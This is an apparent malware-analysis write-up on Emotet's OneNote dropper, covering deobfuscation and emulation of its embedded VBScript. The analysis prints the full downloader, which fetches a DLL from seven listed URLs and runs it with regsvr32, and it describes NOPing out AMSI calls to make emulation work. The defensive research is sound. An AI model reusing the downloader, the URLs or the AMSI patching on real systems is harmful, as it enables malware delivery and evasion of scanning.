Overview

Recently, Emotet has been using OneNote files as its pre-binary dropper/downloader. The delivery chain appears to be:

  • OneNote
  • Embedded WSF file
  • Download DLL (Emotet first stage)

Our goal will be to construct a full static IOC extraction tool for these files!

Sample

1c3a7f886a544fc56e91b7232402a1d86282165e2699b7bf36e2b1781cb2adc2 Malshare

OneNote File Format

  • OneNote files use the file extension .one
  • These documents can contain other files (similar to a .doc file or .xls)
    • It is unclear whether there are limits on the types of files that can be embedded, but .wsf files are accepted
  • The current method used to trick users into executing these embedded files is to place them "under" an image that asks the user to double-click for some reason; the double-click is then passed through to the embedded file.
    • Because these files are launched with a double-click, they must have a valid file extension (note for defenders)

Analysis

  • Extract all embedded files from OneNote document
  • Search for executable file extensions on extracted files
  • Triage these files
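
The extraction step can be sketched as follows. This is a minimal sketch rather than the finished tool: it assumes embedded files are stored as FileDataStoreObject structures as described in the MS-ONESTORE specification (a 16-byte header GUID, an 8-byte length, 12 bytes of unused/reserved fields, then the raw file data). The name extract_embedded is ours, and the sketch recovers only raw bytes, not file names, so the extension check still needs the names from elsewhere.

```python
import struct
import uuid
from typing import Iterator

# Header GUID of a FileDataStoreObject (MS-ONESTORE), converted to on-disk byte order.
FILE_DATA_GUID = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
# guidHeader (16) + cbLength (8) + unused (4) + reserved (8)
HEADER_SIZE = 16 + 8 + 4 + 8


def extract_embedded(data: bytes) -> Iterator[bytes]:
    """Yield the raw bytes of every embedded file found in a .one blob."""
    pos = data.find(FILE_DATA_GUID)
    while pos != -1:
        start = pos + HEADER_SIZE
        if start <= len(data):
            # cbLength is a little-endian 64-bit size right after the GUID.
            (size,) = struct.unpack_from("<Q", data, pos + 16)
            if start + size <= len(data):
                yield data[start:start + size]
        pos = data.find(FILE_DATA_GUID, pos + 1)


# Synthetic demo: one fake embedded script surrounded by filler bytes.
payload = b'<job><script language="VBScript">x=1</script></job>'
blob = (b"filler" + FILE_DATA_GUID + struct.pack("<Q", len(payload))
        + b"\x00" * 12 + payload + b"tail")
for embedded in extract_embedded(blob):
    print(len(embedded), embedded[:16])
```

On a real sample, data would be the bytes of the .one file, and each extracted blob can then be checked for script markers before triage.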

OneNote Triage

  • Inside the OneNote file is a .wsf file which contains an obfuscated script
  • Replacing the execute command with a simple file print gives us the deobfuscated script:
urlcount=1
set fsobject=createobject("scripting.filesystemobject")
currentdir=fsobject.getparentfoldername(wscript.scriptfullname)
set request=createobject("winhttp.winhttprequest.5.1")
set file=wscript.createobject("shell.application")
set strout=createobject("adodb.stream")
useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"
ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
set triplett=createobject("wscript.shell")
url1 = "https://penshorn.org/admin/Ses8712iGR8du/"
url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"
url3 = "https://www.gomespontes.com.br/logs/pd/"
url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"
url5 = "http://ozmeydan.com/cekici/9/"
url6 = "http://softwareulike.com/cWIYxWMPkK/"
url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"
do
call dow
loop  while urlcount<8
public function dow()
on error resume next
select case urlcount
case 1
downstr=url1
case 2
downstr=url2
case 3
downstr=url3
case 4
downstr=url4
case 5
downstr=url5
case 6
downstr=url6
case 7
downstr=url7
end select
request.open "get",downstr,false
request.send
If Err.Number<>0 then
urlcount=urlcount+1
else
strout.open
strout.type=1
if vare=0 then
cad=1
else
far=2
end if
strout.write (request.responsebody)
if roum=0 then
sio=sio+1
else
end if
strout.savetofile pat3
strout.close
armour = "samcom."
set fsobject=createobject("scripting.filesystemobject")
Set f = fsobject.GetFile(pat3)
GetFileSize = clng(f.size/1024)
If GetFileSize > 150 Then
call roize
urlcount = 8
else
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
urlcount=urlcount+1
end if
end if
end function
public function roize
if derti=0 then
sem=sem+1
else
end if
urlcount = 8
triplett.run (loiu),0,true
cor = "samo"
set fsobject=createobject("scripting.filesystemobject")
set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")
textstream.write ("badum tss")
if rotate = 12 then
sable = 54 + 22
else
routtt = "carry"
end if
end function
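
Once the script is deobfuscated, pulling IOCs out of it is mostly string matching. The sketch below is one hedged way to do it: extract_urls and resolve_concat are hypothetical helper names, the regexes only cover the patterns seen in this sample (quoted http/https URLs and chr(N), chr(N+M), chr(N-M) terms), and doubled-quote escapes such as """" are not handled.

```python
import re
from typing import List

URL_RE = re.compile(r'"(https?://[^"\s]+)"', re.IGNORECASE)
# Matches chr(N), chr(N+M), chr(N-M), or a double-quoted literal.
TOKEN_RE = re.compile(r'chr\(\s*(\d+)\s*(?:([+-])\s*(\d+))?\s*\)|"([^"]*)"',
                      re.IGNORECASE)


def extract_urls(script: str) -> List[str]:
    """Return every quoted http(s) URL in the script, in order of appearance."""
    return URL_RE.findall(script)


def resolve_concat(expr: str) -> str:
    """Fold a chr()/string concatenation into the plain string it builds."""
    parts = []
    for match in TOKEN_RE.finditer(expr):
        base, op, delta, literal = match.groups()
        if base is not None:
            value = int(base)
            if op == "+":
                value += int(delta)
            elif op == "-":
                value -= int(delta)
            parts.append(chr(value))
        else:
            parts.append(literal)
    return "".join(parts)


sample = '''ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""
url1 = "https://penshorn.org/admin/Ses8712iGR8du/"
url5 = "http://ozmeydan.com/cekici/9/"
'''
print(extract_urls(sample))
print(repr(resolve_concat(sample.splitlines()[0])))
```

Folding the ouch assignment this way shows that the downloaded DLL is launched through regsvr32.exe.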

Emulation?

Instead of running this live and modifying the script, can we get away with emulating wscript.exe and running the script in an emulator?

Some Thoughts on Emulation

  • We want to dump early enough that we can modify the script code before it is parsed
  • We want to dump late enough that most of the setup is done and we don't have to implement much in dumpulator
  • Currently we are having trouble finding the sweet spot for a dump because wscript calls into scobj, and scobj uses an abstraction to implement the parser
  • When we dump before the parser we still have some thread stuff causing issues (maybe not fixable???)
  • TODO: look into vbscript (without the wscript wrapper); is it simpler??

Taking A Closer Look at The Scripting Engine

We want a way to run vbs/wsf scripts and dump each deobfuscated script stage (or at least each stage, assuming it will be less obfuscated than the last).

We know that wscript

Background

  • For JScript the solution is much simpler, as we can rely on the underlying Node.js JavaScript engine to do the heavy lifting and only implement the JScript-specific objects/calls (see the malware-jail wscript emulator, JScript only)
  • For VBScript there is no good solution, as there is no "basic" script engine that we can rely on.
  • For VBScript we are going to try to do this dynamically
    • Instrument the wscript.exe binary and take a look at which functions are used to 'execute' new scripts dynamically
    • We can also take a look at the AMSI events and see if this is done for us?

cscript.exe

We are using cscript to launch our test VBS script with the following setup (32bit for ease of debugging).

"C:\Windows\SysWOW64\cscript.exe" c:\users\admin\desktop\test.vbs

We are starting with .vbs instead of .wsf to eliminate any additional complexity (wsf is sent to an XML parser first for the header, etc.)

Script State

From a high level we can start by breaking on this (callback?) CScriptingEngine::OnStateChange(enum tagSCRIPTSTATE)

enum tagSCRIPTSTATE
{
  SCRIPTSTATE_UNINITIALIZED = 0x0,
  SCRIPTSTATE_INITIALIZED = 0x5,
  SCRIPTSTATE_STARTED = 0x1,
  SCRIPTSTATE_CONNECTED = 0x2,
  SCRIPTSTATE_DISCONNECTED = 0x3,
  SCRIPTSTATE_CLOSED = 0x4,
};

This gives us a convenient place to break and investigate the script before it has been passed to the script engine.

vbscript.dll

Our first focus in the actual scripting engine is the Antimalware Scan Interface (AMSI) component, which parses the script before it is actually run and sends events to AMSI.

JAmsiProcessor

JAmsi::JAmsiProcessor(struct IDispatch *, long, struct tagDISPPARAMS *, class CSession *)

The JAmsiProcessor is actually called for each "execution" of a script (so keywords within a running script will trigger it). The main purpose appears to be to parse the script into command tokens then hash the token (ex. echo) with a version of CRC32 (seed=0xffffffff, inverted result) and then compare the hashes against known values used to trigger AMSI events.
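
To make the hashing step concrete, here is a small sketch of a CRC32 with seed 0xffffffff and an inverted result. It assumes the standard reflected polynomial 0xEDB88320 and hashes the token as plain ASCII bytes; neither detail was confirmed against vbscript.dll, and the function name crc32_token is ours.

```python
import zlib


def crc32_token(token: bytes) -> int:
    """Bitwise CRC32: seed 0xFFFFFFFF, reflected polynomial, final inversion."""
    crc = 0xFFFFFFFF
    for byte in token:
        crc ^= byte
        for _ in range(8):
            # Shift right one bit, folding in the polynomial when the low bit is set.
            crc = (crc >> 1) ^ (0xEDB88320 if crc & 1 else 0)
    return crc ^ 0xFFFFFFFF


token = b"echo"
print(hex(crc32_token(token)))
# With these assumptions the result is the same as Python's built-in CRC32.
print(crc32_token(token) == zlib.crc32(token))
```

If the engine's variant differs (for example by hashing wide characters), only the byte sequence fed to the function would need to change.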

Script Execution

The following is an example call stack for an executed script.

COleScript::ExecutePendingScripts
CSession::Execute 
CScriptEntryPoint::Call  
CScriptRuntime::Run 
CScriptRuntime::RunNoEH

Following the flow (thank you @mishap)...

VbsExecute->rtEval and then it recurses back into CScriptEntryPoint::Call

     CSession::Execute       |
     CScriptEntryPoint::Call |--- Setting up script
     CScriptRuntime::Run     | 
     -------------------------
     CScriptRuntime::RunNoEH |--- Parses over the script
  -->VbsExecute              |--- Hit execute keyword
  |  rtEval                  |--- Evaluates execute args
  |  CScriptEntryPoint::Call |
  |  CScriptRuntime::Run     |--- Recursive call back to parser   
  ---CScriptRuntime::RunNoEH | 
     -------------------------

Based on this we can break on VbsExecute and observe any scripts that are being executed.

struct IEntryPoint *__stdcall VbsExecute(struct VAR *a1, int a2, execute_data *arg_data)

We have not fully reversed the structure of the arguments but the following is a start (it is wrong in some cases!!)

struct execute_data
{
  DWORD d0;
  DWORD d1;
  wchar_t *code;
};

This is the x64dbg log statement we were using for a breakpoint on VbsExecute:

{utf16@[[esp+0xc] + 8]}
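
The log expression reads as two dereferences: at the entry of a 32-bit stdcall function [esp] holds the return address, so the third argument (arg_data) is at esp+0xc, and the code pointer is the field at offset 8 of that structure. The sketch below walks the same path over a fake address space; the reader callback, addresses, and function name are all made up for illustration, and the structure layout is the partial one given above.

```python
import struct
from typing import Callable

Reader = Callable[[int, int], bytes]  # read(address, size) -> bytes


def execute_code_ptr(read: Reader, esp: int) -> int:
    """Follow [[esp+0xc]+8]: third stack argument, then the field at offset 8."""
    (arg_data,) = struct.unpack("<I", read(esp + 0xC, 4))     # execute_data *arg_data
    (code_ptr,) = struct.unpack("<I", read(arg_data + 8, 4))  # wchar_t *code
    return code_ptr


# Tiny fake address space for the demo (all addresses are invented).
BASE = 0x1000
memory = bytearray(0x100)


def fake_read(address: int, size: int) -> bytes:
    offset = address - BASE
    return bytes(memory[offset:offset + size])


esp = BASE
struct.pack_into("<I", memory, 0x0C, 0x1040)      # third argument -> execute_data at 0x1040
struct.pack_into("<I", memory, 0x40 + 8, 0x1080)  # execute_data.code -> 0x1080
print(hex(execute_code_ptr(fake_read, esp)))
```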

Instrumenting VBscript

Also thanks to @mishap we dug further and discovered that rtEval is called with the contents of the script to be executed so we can break on this instead and pull the script (wide string) from ECX (fastcall).

struct IEntryPoint *__fastcall rtEval(unsigned __int16 *a1, struct IEntryPoint *a2, int a3, int a4)

The following is all we need in x64dbg to log all executed scripts with a breakpoint on this function: {utf16@ecx}

Dumpulator Emulation!

Now that we have a better place to dump we can try this again.

  • Run a test script that includes execute until a bp on rtEval is hit
  • Dump
  • Load in Dumpulator
  • ECX contains a pointer to the script (wide string)
  • Place Dumpulator bp on rtEval
  • Replace this script with the target script in dumpulator and run
  • When the Dumpulator rtEval bp is hit it means that another script is attempting to execute (pointed to by ECX)
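
Reading the wide string that ECX points to can be sketched like this. It is a minimal sketch with a hypothetical helper name (read_wide_string) that takes any read(address, size) callback; it steps two bytes at a time so that a character whose low byte is zero is not mistaken for the terminator.

```python
from typing import Callable


def read_wide_string(read: Callable[[int, int], bytes], ptr: int,
                     max_chars: int = 1_000_000) -> str:
    """Read a null-terminated UTF-16LE string one 16-bit code unit at a time."""
    units = bytearray()
    for _ in range(max_chars):
        unit = read(ptr, 2)
        if unit == b"\x00\x00":  # aligned 16-bit terminator
            break
        units += unit
        ptr += 2
    return units.decode("utf-16-le", errors="replace")


# Demo against an in-memory buffer standing in for emulator memory.
buffer = 'execute "x=1"'.encode("utf-16-le") + b"\x00\x00" + b"garbage"


def buffer_read(address: int, size: int) -> bytes:
    return buffer[address:address + size]


print(read_wide_string(buffer_read, 0))
```

Inside a Dumpulator breakpoint callback the same helper could be called as read_wide_string(dp.read, dp.regs.ecx), since dp.read takes an address and a size.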

We still ran into a few issues but managed to work past them...

Dumpulator (Unicorn) AVX Support

There is no support for AVX in Unicorn so we had to use a VM with AVX instructions disabled to take our dump for Dumpulator.

Syscalls!!

Inside of the rtEval function the AMSI functions are called which in turn call into the Defender DLL. This causes all kinds of Syscall activity that we don't want to implement in Dumpulator so our solution was to just NOP out the AMSI calls. (Image and implementation courtesy of @mishap)
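
As a rough illustration of the patching idea, the sketch below overwrites a single call instruction in a byte buffer with NOPs. It is not the patch we applied: the helper name nop_call is hypothetical, it only recognises two common x86 encodings (E8 rel32 and FF 15 disp32), and it does not rebalance the stack or set a return value, which a real patch has to account for if the callee cleans up its own arguments or the caller checks EAX.

```python
def nop_call(code: bytearray, offset: int) -> int:
    """Overwrite one call instruction at offset with NOPs and return its length."""
    if code[offset] == 0xE8:                      # call rel32
        length = 5
    elif code[offset:offset + 2] == b"\xFF\x15":  # call dword ptr [disp32]
        length = 6
    else:
        raise ValueError(f"no supported call opcode at offset {offset:#x}")
    code[offset:offset + length] = b"\x90" * length
    return length


# push ecx; call rel32; test eax, eax
stub = bytearray(b"\x51\xE8\x10\x20\x30\x40\x85\xC0")
patched = nop_call(stub, 1)
print(patched, stub.hex())
```

The same bytes could be written into a loaded dump with dp.write(address, b"\x90" * length) before starting emulation.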

Dumpulator Alloc Bug?

There was some sort of issue with page alignment in dumpulator's memory manager so we just forced it in ZwAllocateVirtualMemory.

base = round_to_pages(base)

This will be opened as a proper issue...
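
For reference, the arithmetic behind page alignment looks like this. The sketch assumes 4 KiB pages and that round_to_pages rounds up to the next page boundary; the two helper names here are ours, not Dumpulator's.

```python
PAGE_SIZE = 0x1000  # 4 KiB pages


def round_up_to_page(value: int) -> int:
    """Smallest page-aligned value that is >= value."""
    return (value + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)


def align_down_to_page(value: int) -> int:
    """Largest page-aligned value that is <= value."""
    return value & ~(PAGE_SIZE - 1)


for sample in (0x0, 0x4FE2, 0x5000):
    print(hex(sample), hex(round_up_to_page(sample)), hex(align_down_to_page(sample)))
```

Either helper makes the base & 0xFFF == 0 assertion pass, but for an unaligned base they select different pages, which is worth keeping in mind when the issue is written up.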

Limitations

This is just a proof of concept.

  • We only handle the execute method from VBS; other execution methods may need additional hooks
  • We also don't handle any actual script execution (i.e. calls to Windows APIs from the script)
  • We only deobfuscate the first layer then end
  • Currently we don't exit cleanly at the end of the script (it runs till failure)

Script Prep

Because we are effectively treating our target script as though it were a script passed to the execute command as a string, it must be encoded as UTF-16 and it cannot contain any comments.

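# Read the target script and drop full-line comments (lines starting with ')
with open('/tmp/bad.vbs', 'rb') as f:
    script = f.read()

out = b''
for line in script.split(b'\n'):
    # startswith() is safe on empty lines, where line[0] would raise IndexError
    if line.lstrip().startswith(b"'"):
        continue
    out += line + b'\n'

# Widen every byte to a 16-bit code unit (same as appending a zero byte to each)
# and add the wide null terminator
script_bytes = out.decode('latin-1').encode('utf-16-le') + b'\x00\x00'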

Dumpulator Run

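from dataclasses import dataclass
from typing import Annotated, Callable, Dict, Union, Optional

from dumpulator import Dumpulator, syscall
from dumpulator.dumpulator import ExceptionInfo, ExceptionType
# Types and helpers used by the ZwAllocateVirtualMemory override below
# (HANDLE, P, SAL, MemoryProtect, MEM_COMMIT, round_to_pages, STATUS_SUCCESS, ...);
# the exact module layout may differ between dumpulator versions
from dumpulator.native import *
from dumpulator.memory import *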

seen = False

@dataclass
class BreakpointInfo:
    address: int
    original: bytes
    callback: Callable[[], None]

class MyDumpulator(Dumpulator):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        self._breakpoints: Dict[int, BreakpointInfo] = {}
        self._breakpoint_step: Optional[BreakpointInfo] = None
        self.set_exception_hook(self.exception_hook)

    def set_breakpoint(self, address: Union[int, str], callback: Callable[[], None]):
        if isinstance(address, str):
            module_name, export_name = address.split(":")
            module = self.modules.find(module_name)
            if module is None:
                raise KeyError(f"Module '{module_name}' not found")
            export = module.find_export(export_name)
            if export is None:
                raise KeyError(f"Export '{export_name}' not found in module '{module_name}'")
            assert export.forward is None
            address: int = export.address
        assert address not in self._breakpoints
        self._breakpoints[address] = BreakpointInfo(address, self.read(address, 1), callback)
        self.write(address, b"\xCC")

    def remove_breakpoint(self, address: int):
        assert address in self._breakpoints
        bp = self._breakpoints[address]
        self.write(bp.address, bp.original)
        del self._breakpoints[address]

    def exception_hook(self, exception: ExceptionInfo) -> Optional[int]:
        if exception.type == ExceptionType.Interrupt:
            if exception.interrupt_number == 3:  # int3
                # Find the breakpoint
                bp = self._breakpoints.get(self.regs.cip - 1)
                if bp is None:
                    print(f"Unexpected int3 at {hex(self.regs.cip)}, ignoring")
                    return None
                print(f"Reached breakpoint at {hex(bp.address)}")

                # Execute the breakpoint callback
                self.regs.cip -= 1
                bp.callback()

                # Restore the breakpoint if it wasn't removed
                if bp.address in self._breakpoints:
                    print('Restoring breakpoint')
                    self.write(bp.address, bp.original)
                    self.regs.eflags |= 0x100  # trap flag
                    self._breakpoint_step = bp

                # Resume execution at the CIP (the callback might change it)
                return self.regs.cip
            elif exception.interrupt_number == 1:  # single step
                if self._breakpoint_step is None:
                    print(f"Unexpected single step at {hex(self.regs.cip)}")
                    return None

                print("Single stepping after breakpoint")
                self.regs.eflags &= ~0x100  # remove trap flag
                self.write(self._breakpoint_step.address, b"\xCC")
                self._breakpoint_step = None
                return self.regs.cip

        # Let the original exception handler do this
        return None

    
    
    
@syscall
def ZwAllocateVirtualMemory(dp: Dumpulator,
                            ProcessHandle: Annotated[HANDLE, SAL("_In_")],
                            BaseAddress: Annotated[P[PVOID], SAL("_Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize))")],
                            ZeroBits: Annotated[ULONG_PTR, SAL("_In_")],
                            RegionSize: Annotated[P[SIZE_T], SAL("_Inout_")],
                            AllocationType: Annotated[ULONG, SAL("_In_")],
                            Protect: Annotated[ULONG, SAL("_In_")]
                            ):
    assert ZeroBits == 0
    assert ProcessHandle == dp.NtCurrentProcess()
    base = dp.read_ptr(BaseAddress.ptr)
    base = round_to_pages(base)
    assert base & 0xFFF == 0
    size = round_to_pages(dp.read_ptr(RegionSize.ptr))
    #assert size != 0
    protect = MemoryProtect(Protect)
    if AllocationType == MEM_COMMIT:
        if base == 0:
            base = dp.memory.find_free(size)
            dp.memory.reserve(base, size, protect)
            BaseAddress.write_ptr(base)
            RegionSize.write_ptr(size)
        #print(f"commit({hex(base)}[{hex(size)}], {protect})")
        dp.memory.commit(base, size, protect)
    elif AllocationType == MEM_RESERVE:
        if base == 0:
            base = dp.memory.find_free(size)
            BaseAddress.write_ptr(base)
            RegionSize.write_ptr(size)
        #print(f"reserve({hex(base)}[{hex(size)}], {protect})")
        dp.memory.reserve(base, size, protect)
    elif AllocationType == MEM_COMMIT | MEM_RESERVE:
        if base == 0:
            base = dp.memory.find_free(size)
            BaseAddress.write_ptr(base)
            RegionSize.write_ptr(size)
        #print(f"reserve+commit({hex(base)}[{hex(size)}], {protect})")
        dp.memory.reserve(base, size, protect)
        dp.memory.commit(base, size)
    else:
        raise NotImplementedError()
    return STATUS_SUCCESS


dp = MyDumpulator("/tmp/cscript_nopped.dmp", quiet=True)

def rteval_bp():
    global seen
    print("hit bp")
    #print(dp.read_str(dp.regs.ecx, encoding='utf-16'))
   

    if seen:
        print(seen)
        out = b''
        ptr = dp.regs.ecx
        c = 0
        while c < 100000000:
            c += 1
            ptr_byte = dp.read(ptr, 1)
            out += ptr_byte
            if ptr_byte == b'\x00':
                if dp.read(ptr+1, 1) == b'\x00':
                    break
            ptr += 1
        print("== SCRIPT ==")
        print(out.decode('utf-16').replace('\r','\n'))
        dp.remove_breakpoint(0x7021074D)
        dp.eip = 0x13371337
        dp.stop()
    else:
        print(seen)
        seen = True
        

dp.set_breakpoint(0x7021074D, rteval_bp)


ptr_script_bytes = dp.allocate(len(script_bytes),page_align = True)
dp.write(ptr_script_bytes, script_bytes)
                               
dp.regs.ecx = ptr_script_bytes

dp.write(dp.regs.ecx, script_bytes)



dp.start(dp.regs.cip, end=0x13371337)
         
         
         
         
interrupt 3 (#BP, Breakpoint), cip = 0x7021074e, cs = 0x23
Reached breakpoint at 0x7021074d
hit bp
False
Restoring breakpoint
interrupt 1 (#DB, Debug), cip = 0x7021074f, cs = 0x23
Single stepping after breakpoint
interrupt 3 (#BP, Breakpoint), cip = 0x7021074e, cs = 0x23
Reached breakpoint at 0x7021074d
hit bp
True
== SCRIPT ==
urlcount=1
set fsobject=createobject("scripting.filesystemobject")
currentdir=fsobject.getparentfoldername(wscript.scriptfullname)
set request=createobject("winhttp.winhttprequest.5.1")
set file=wscript.createobject("shell.application")
set strout=createobject("adodb.stream")
useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"
ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
set triplett=createobject("wscript.shell")
url1 = "https://penshorn.org/admin/Ses8712iGR8du/"
url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"
url3 = "https://www.gomespontes.com.br/logs/pd/"
url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"
url5 = "http://ozmeydan.com/cekici/9/"
url6 = "http://softwareulike.com/cWIYxWMPkK/"
url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"
do
call dow
loop  while urlcount<8
public function dow()
on error resume next
select case urlcount
case 1
downstr=url1
case 2
downstr=url2
case 3
downstr=url3
case 4
downstr=url4
case 5
downstr=url5
case 6
downstr=url6
case 7
downstr=url7
end select
request.open "get",downstr,false
request.send
If Err.Number<>0 then
urlcount=urlcount+1
else
strout.open
strout.type=1
if vare=0 then
cad=1
else
far=2
end if
strout.write (request.responsebody)
if roum=0 then
sio=sio+1
else
end if
strout.savetofile pat3
strout.close
armour = "samcom."
set fsobject=createobject("scripting.filesystemobject")
Set f = fsobject.GetFile(pat3)
GetFileSize = clng(f.size/1024)
If GetFileSize > 150 Then
call roize
urlcount = 8
else
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
urlcount=urlcount+1
end if
end if
end function
public function roize
if derti=0 then
sem=sem+1
else
end if
urlcount = 8
triplett.run (loiu),0,true
cor = "samo"
set fsobject=createobject("scripting.filesystemobject")
set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")
textstream.write ("badum tss")
if rotate = 12 then
sable = 54 + 22
else
routtt = "carry"
end if
end function

interrupt 3 (#BP, Breakpoint), cip = 0x7021074e, cs = 0x23
Unexpected int3 at 0x7021074e, ignoring
Exception thrown during syscall implementation, stopping emulation!
forced exit memory operation 21 of 0x4fe2[0x1] = 0x0
---------------------------------------------------------------------------
NotImplementedError                       Traceback (most recent call last)
<ipython-input-8-cb4a538155d4> in <module>
    170 
    171 
--> 172 dp.start(dp.regs.cip, end=0x13371337)
    173 
    174 

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/dumpulator/dumpulator.py in start(self, begin, end, count)
   1110             except UcError as err:
   1111                 if self.kill_me is not None and type(self.kill_me) is not UcError:
-> 1112                     raise self.kill_me
   1113                 if self._exception.type != ExceptionType.NoException:
   1114                     # Handle the exception outside of the except handler

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/unicorn/unicorn.py in wrapper(self, *args, **kwargs)
    390         """
    391         try:
--> 392             return func(self, *args, **kwargs)
    393         except Exception as e:
    394             # If multiple hooks raise exceptions, just use the first one

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/unicorn/unicorn.py in _hook_insn_syscall_cb(self, handle, user_data)
    713         # call user's callback with self object
    714         (cb, data) = self._callbacks[user_data]
--> 715         cb(self, data)
    716 
    717     @_catch_hook_exception

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/dumpulator/dumpulator.py in _hook_syscall(uc, dp)
   1619             except Exception as exc:
   1620                 dp.error(f"Exception thrown during syscall implementation, stopping emulation!")
-> 1621                 raise dp.raise_kill(exc) from None
   1622             finally:
   1623                 dp.sequence_id += 1

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/dumpulator/dumpulator.py in _hook_syscall(uc, dp)
   1601             dp.info(")")
   1602             try:
-> 1603                 status = syscall_impl(dp, *args)
   1604                 if isinstance(status, ExceptionInfo):
   1605                     print("context switch, stopping emulation")

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/dumpulator/ntsyscalls.py in ZwQueryInformationJobObject(dp, JobHandle, JobObjectInformationClass, JobObjectInformation, JobObjectInformationLength, ReturnLength)
   2972                                 ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
   2973                                 ):
-> 2974     raise NotImplementedError()
   2975 
   2976 @syscall

NotImplementedError: